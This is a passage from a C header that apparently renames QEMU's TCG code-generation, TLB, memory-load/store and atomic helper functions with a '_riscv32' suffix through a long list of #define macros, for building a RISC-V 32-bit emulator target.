#define tcg_gen_sextract_i64 tcg_gen_sextract_i64_riscv32
#define tcg_gen_extract2_i64 tcg_gen_extract2_i64_riscv32
#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_riscv32
#define tcg_gen_add2_i64 tcg_gen_add2_i64_riscv32
#define tcg_gen_sub2_i64 tcg_gen_sub2_i64_riscv32
#define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_riscv32
#define tcg_gen_muls2_i64 tcg_gen_muls2_i64_riscv32
#define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_riscv32
#define tcg_gen_smin_i64 tcg_gen_smin_i64_riscv32
#define tcg_gen_umin_i64 tcg_gen_umin_i64_riscv32
#define tcg_gen_smax_i64 tcg_gen_smax_i64_riscv32
#define tcg_gen_umax_i64 tcg_gen_umax_i64_riscv32
#define tcg_gen_abs_i64 tcg_gen_abs_i64_riscv32
#define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_riscv32
#define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_riscv32
#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_riscv32
#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_riscv32
#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_riscv32
#define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_riscv32
#define tcg_gen_extr32_i64 tcg_gen_extr32_i64_riscv32
#define tcg_gen_exit_tb tcg_gen_exit_tb_riscv32
#define tcg_gen_goto_tb tcg_gen_goto_tb_riscv32
#define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_riscv32
#define check_exit_request check_exit_request_riscv32
#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_riscv32
#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_riscv32
#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_riscv32
#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_riscv32
#define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_riscv32
#define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_riscv32
#define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_riscv32
#define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_riscv32
#define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_riscv32
#define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_riscv32
#define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_riscv32
#define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_riscv32
#define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_riscv32
#define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_riscv32
#define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_riscv32
#define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_riscv32
#define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_riscv32
#define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_riscv32
#define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_riscv32
#define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_riscv32
#define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_riscv32
#define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_riscv32
#define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_riscv32
#define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_riscv32
#define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_riscv32
#define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_riscv32
#define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_riscv32
#define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_riscv32
#define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_riscv32
#define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_riscv32
#define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_riscv32
#define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_riscv32
#define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_riscv32
#define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_riscv32
#define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_riscv32
#define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_riscv32
#define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_riscv32
#define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_riscv32
#define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_riscv32
#define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_riscv32
#define simd_desc simd_desc_riscv32
#define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_riscv32
#define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_riscv32
#define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_riscv32
#define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_riscv32
#define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_riscv32
#define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_riscv32
#define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_riscv32
#define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_riscv32
#define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_riscv32
#define tcg_gen_gvec_2 tcg_gen_gvec_2_riscv32
#define tcg_gen_gvec_2i tcg_gen_gvec_2i_riscv32
#define tcg_gen_gvec_2s tcg_gen_gvec_2s_riscv32
#define tcg_gen_gvec_3 tcg_gen_gvec_3_riscv32
#define tcg_gen_gvec_3i tcg_gen_gvec_3i_riscv32
#define tcg_gen_gvec_4 tcg_gen_gvec_4_riscv32
#define tcg_gen_gvec_mov tcg_gen_gvec_mov_riscv32
#define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_riscv32
#define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_riscv32
#define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_riscv32
#define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_riscv32
#define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_riscv32
#define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_riscv32
#define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_riscv32
#define tcg_gen_gvec_not tcg_gen_gvec_not_riscv32
#define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_riscv32
#define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_riscv32
#define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_riscv32
#define tcg_gen_gvec_add tcg_gen_gvec_add_riscv32
#define tcg_gen_gvec_adds tcg_gen_gvec_adds_riscv32
#define tcg_gen_gvec_addi tcg_gen_gvec_addi_riscv32
#define tcg_gen_gvec_subs tcg_gen_gvec_subs_riscv32
#define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_riscv32
#define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_riscv32
#define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_riscv32
#define tcg_gen_gvec_sub tcg_gen_gvec_sub_riscv32
#define tcg_gen_gvec_mul tcg_gen_gvec_mul_riscv32
#define tcg_gen_gvec_muls tcg_gen_gvec_muls_riscv32
#define tcg_gen_gvec_muli tcg_gen_gvec_muli_riscv32
#define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_riscv32
#define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_riscv32
#define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_riscv32
#define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_riscv32
#define tcg_gen_gvec_smin tcg_gen_gvec_smin_riscv32
#define tcg_gen_gvec_umin tcg_gen_gvec_umin_riscv32
#define tcg_gen_gvec_smax tcg_gen_gvec_smax_riscv32
#define tcg_gen_gvec_umax tcg_gen_gvec_umax_riscv32
#define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_riscv32
#define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_riscv32
#define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_riscv32
#define tcg_gen_gvec_neg tcg_gen_gvec_neg_riscv32
#define tcg_gen_gvec_abs tcg_gen_gvec_abs_riscv32
#define tcg_gen_gvec_and tcg_gen_gvec_and_riscv32
#define tcg_gen_gvec_or tcg_gen_gvec_or_riscv32
#define tcg_gen_gvec_xor tcg_gen_gvec_xor_riscv32
#define tcg_gen_gvec_andc tcg_gen_gvec_andc_riscv32
#define tcg_gen_gvec_orc tcg_gen_gvec_orc_riscv32
#define tcg_gen_gvec_nand tcg_gen_gvec_nand_riscv32
#define tcg_gen_gvec_nor tcg_gen_gvec_nor_riscv32
#define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_riscv32
#define tcg_gen_gvec_ands tcg_gen_gvec_ands_riscv32
#define tcg_gen_gvec_andi tcg_gen_gvec_andi_riscv32
#define tcg_gen_gvec_xors tcg_gen_gvec_xors_riscv32
#define tcg_gen_gvec_xori tcg_gen_gvec_xori_riscv32
#define tcg_gen_gvec_ors tcg_gen_gvec_ors_riscv32
#define tcg_gen_gvec_ori tcg_gen_gvec_ori_riscv32
#define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_riscv32
#define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_riscv32
#define tcg_gen_gvec_shli tcg_gen_gvec_shli_riscv32
#define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_riscv32
#define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_riscv32
#define tcg_gen_gvec_shri tcg_gen_gvec_shri_riscv32
#define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_riscv32
#define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_riscv32
#define tcg_gen_gvec_sari tcg_gen_gvec_sari_riscv32
#define tcg_gen_gvec_shls tcg_gen_gvec_shls_riscv32
#define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_riscv32
#define tcg_gen_gvec_sars tcg_gen_gvec_sars_riscv32
#define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_riscv32
#define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_riscv32
#define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_riscv32
#define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_riscv32
#define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_riscv32
#define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_riscv32
#define vec_gen_2 vec_gen_2_riscv32
#define vec_gen_3 vec_gen_3_riscv32
#define vec_gen_4 vec_gen_4_riscv32
#define tcg_gen_mov_vec tcg_gen_mov_vec_riscv32
#define tcg_const_zeros_vec tcg_const_zeros_vec_riscv32
#define tcg_const_ones_vec tcg_const_ones_vec_riscv32
#define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_riscv32
#define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_riscv32
#define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_riscv32
#define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_riscv32
#define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_riscv32
#define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_riscv32
#define tcg_gen_dupi_vec tcg_gen_dupi_vec_riscv32
#define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_riscv32
#define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_riscv32
#define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_riscv32
#define tcg_gen_ld_vec tcg_gen_ld_vec_riscv32
#define tcg_gen_st_vec tcg_gen_st_vec_riscv32
#define tcg_gen_stl_vec tcg_gen_stl_vec_riscv32
#define tcg_gen_and_vec tcg_gen_and_vec_riscv32
#define tcg_gen_or_vec tcg_gen_or_vec_riscv32
#define tcg_gen_xor_vec tcg_gen_xor_vec_riscv32
#define tcg_gen_andc_vec tcg_gen_andc_vec_riscv32
#define tcg_gen_orc_vec tcg_gen_orc_vec_riscv32
#define tcg_gen_nand_vec tcg_gen_nand_vec_riscv32
#define tcg_gen_nor_vec tcg_gen_nor_vec_riscv32
#define tcg_gen_eqv_vec tcg_gen_eqv_vec_riscv32
#define tcg_gen_not_vec tcg_gen_not_vec_riscv32
#define tcg_gen_neg_vec tcg_gen_neg_vec_riscv32
#define tcg_gen_abs_vec tcg_gen_abs_vec_riscv32
#define tcg_gen_shli_vec tcg_gen_shli_vec_riscv32
#define tcg_gen_shri_vec tcg_gen_shri_vec_riscv32
#define tcg_gen_sari_vec tcg_gen_sari_vec_riscv32
#define tcg_gen_cmp_vec tcg_gen_cmp_vec_riscv32
#define tcg_gen_add_vec tcg_gen_add_vec_riscv32
#define tcg_gen_sub_vec tcg_gen_sub_vec_riscv32
#define tcg_gen_mul_vec tcg_gen_mul_vec_riscv32
#define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_riscv32
#define tcg_gen_usadd_vec tcg_gen_usadd_vec_riscv32
#define tcg_gen_sssub_vec tcg_gen_sssub_vec_riscv32
#define tcg_gen_ussub_vec tcg_gen_ussub_vec_riscv32
#define tcg_gen_smin_vec tcg_gen_smin_vec_riscv32
#define tcg_gen_umin_vec tcg_gen_umin_vec_riscv32
#define tcg_gen_smax_vec tcg_gen_smax_vec_riscv32
#define tcg_gen_umax_vec tcg_gen_umax_vec_riscv32
#define tcg_gen_shlv_vec tcg_gen_shlv_vec_riscv32
#define tcg_gen_shrv_vec tcg_gen_shrv_vec_riscv32
#define tcg_gen_sarv_vec tcg_gen_sarv_vec_riscv32
#define tcg_gen_shls_vec tcg_gen_shls_vec_riscv32
#define tcg_gen_shrs_vec tcg_gen_shrs_vec_riscv32
#define tcg_gen_sars_vec tcg_gen_sars_vec_riscv32
#define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_riscv32
#define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_riscv32
#define tb_htable_lookup tb_htable_lookup_riscv32
#define tb_set_jmp_target tb_set_jmp_target_riscv32
#define cpu_exec cpu_exec_riscv32
#define cpu_loop_exit_noexc cpu_loop_exit_noexc_riscv32
#define cpu_reloading_memory_map cpu_reloading_memory_map_riscv32
#define cpu_loop_exit cpu_loop_exit_riscv32
#define cpu_loop_exit_restore cpu_loop_exit_restore_riscv32
#define cpu_loop_exit_atomic cpu_loop_exit_atomic_riscv32
#define tlb_init tlb_init_riscv32
#define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_riscv32
#define tlb_flush tlb_flush_riscv32
#define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_riscv32
#define tlb_flush_all_cpus tlb_flush_all_cpus_riscv32
#define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_riscv32
#define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_riscv32
#define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_riscv32
#define tlb_flush_page tlb_flush_page_riscv32
#define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_riscv32
#define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_riscv32
#define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_riscv32
#define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_riscv32
#define tlb_protect_code tlb_protect_code_riscv32
#define tlb_unprotect_code tlb_unprotect_code_riscv32
#define tlb_reset_dirty tlb_reset_dirty_riscv32
#define tlb_set_dirty tlb_set_dirty_riscv32
#define tlb_set_page_with_attrs tlb_set_page_with_attrs_riscv32
#define tlb_set_page tlb_set_page_riscv32
#define get_page_addr_code_hostp get_page_addr_code_hostp_riscv32
#define get_page_addr_code get_page_addr_code_riscv32
#define probe_access probe_access_riscv32
#define tlb_vaddr_to_host tlb_vaddr_to_host_riscv32
#define helper_ret_ldub_mmu helper_ret_ldub_mmu_riscv32
#define helper_le_lduw_mmu helper_le_lduw_mmu_riscv32
#define helper_be_lduw_mmu helper_be_lduw_mmu_riscv32
#define helper_le_ldul_mmu helper_le_ldul_mmu_riscv32
#define helper_be_ldul_mmu helper_be_ldul_mmu_riscv32
#define helper_le_ldq_mmu helper_le_ldq_mmu_riscv32
#define helper_be_ldq_mmu helper_be_ldq_mmu_riscv32
#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_riscv32
#define helper_le_ldsw_mmu helper_le_ldsw_mmu_riscv32
#define helper_be_ldsw_mmu helper_be_ldsw_mmu_riscv32
#define helper_le_ldsl_mmu helper_le_ldsl_mmu_riscv32
#define helper_be_ldsl_mmu helper_be_ldsl_mmu_riscv32
#define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_riscv32
#define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_riscv32
#define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_riscv32
#define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_riscv32
#define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_riscv32
#define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_riscv32
#define cpu_ldub_data_ra cpu_ldub_data_ra_riscv32
#define cpu_ldsb_data_ra cpu_ldsb_data_ra_riscv32
#define cpu_lduw_data_ra cpu_lduw_data_ra_riscv32
#define cpu_ldsw_data_ra cpu_ldsw_data_ra_riscv32
#define cpu_ldl_data_ra cpu_ldl_data_ra_riscv32
#define cpu_ldq_data_ra cpu_ldq_data_ra_riscv32
#define cpu_ldub_data cpu_ldub_data_riscv32
#define cpu_ldsb_data cpu_ldsb_data_riscv32
#define cpu_lduw_data cpu_lduw_data_riscv32
#define cpu_ldsw_data cpu_ldsw_data_riscv32
#define cpu_ldl_data cpu_ldl_data_riscv32
#define cpu_ldq_data cpu_ldq_data_riscv32
#define helper_ret_stb_mmu helper_ret_stb_mmu_riscv32
#define helper_le_stw_mmu helper_le_stw_mmu_riscv32
#define helper_be_stw_mmu helper_be_stw_mmu_riscv32
#define helper_le_stl_mmu helper_le_stl_mmu_riscv32
#define helper_be_stl_mmu helper_be_stl_mmu_riscv32
#define helper_le_stq_mmu helper_le_stq_mmu_riscv32
#define helper_be_stq_mmu helper_be_stq_mmu_riscv32
#define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_riscv32
#define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_riscv32
#define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_riscv32
#define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_riscv32
#define cpu_stb_data_ra cpu_stb_data_ra_riscv32
#define cpu_stw_data_ra cpu_stw_data_ra_riscv32
#define cpu_stl_data_ra cpu_stl_data_ra_riscv32
#define cpu_stq_data_ra cpu_stq_data_ra_riscv32
#define cpu_stb_data cpu_stb_data_riscv32
#define cpu_stw_data cpu_stw_data_riscv32
#define cpu_stl_data cpu_stl_data_riscv32
#define cpu_stq_data cpu_stq_data_riscv32
#define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_riscv32
#define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_riscv32
#define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_riscv32
#define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_riscv32
#define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_riscv32
#define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_riscv32
#define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_riscv32
#define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_riscv32
#define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_riscv32
#define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_riscv32
#define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_riscv32
#define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_riscv32
#define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_riscv32
#define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_riscv32
#define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_riscv32
#define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_riscv32
#define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_riscv32
#define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_riscv32
#define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_riscv32
#define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_riscv32
#define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_riscv32
#define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_riscv32
#define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_riscv32
#define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_riscv32
#define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_riscv32
#define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_riscv32
#define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_riscv32
#define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_riscv32
#define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_riscv32
#define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_riscv32
#define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_riscv32
#define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_riscv32
#define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_riscv32
#define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_riscv32
#define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_riscv32
#define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_riscv32
#define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_riscv32
#define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_riscv32
#define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_riscv32
#define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_riscv32
#define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_riscv32
#define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_riscv32
#define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_riscv32
#define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_riscv32
#define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_riscv32
#define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_riscv32
#define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_riscv32
#define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_riscv32
#define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_riscv32
#define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_riscv32
#define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_riscv32
#define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_riscv32
#define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_riscv32
#define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_riscv32
#define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_riscv32
#define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_riscv32
#define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_riscv32
#define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_riscv32
#define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_riscv32
#define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_riscv32
#define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_riscv32
#define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_riscv32
#define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_riscv32
#define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_riscv32
#define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_riscv32
#define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_riscv32
#define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_riscv32
#define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_riscv32
#define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_riscv32
#define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_riscv32
#define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_riscv32
#define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_riscv32
#define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_riscv32
#define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_riscv32
#define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_riscv32
#define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_riscv32
#define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_riscv32
#define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_riscv32
#define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_riscv32
#define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_riscv32
#define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_riscv32
#define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_riscv32
#define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_riscv32
#define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_riscv32
#define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_riscv32
#define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_riscv32
#define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_riscv32
#define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_riscv32
#define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_riscv32
#define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_riscv32
#define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_riscv32
#define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_riscv32
#define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_riscv32
#define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_riscv32
#define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_riscv32
#define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_riscv32
#define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_riscv32
#define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_riscv32
#define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_riscv32
#define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_riscv32
#define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_riscv32
#define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_riscv32
#define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_riscv32
#define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_riscv32
#define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_riscv32
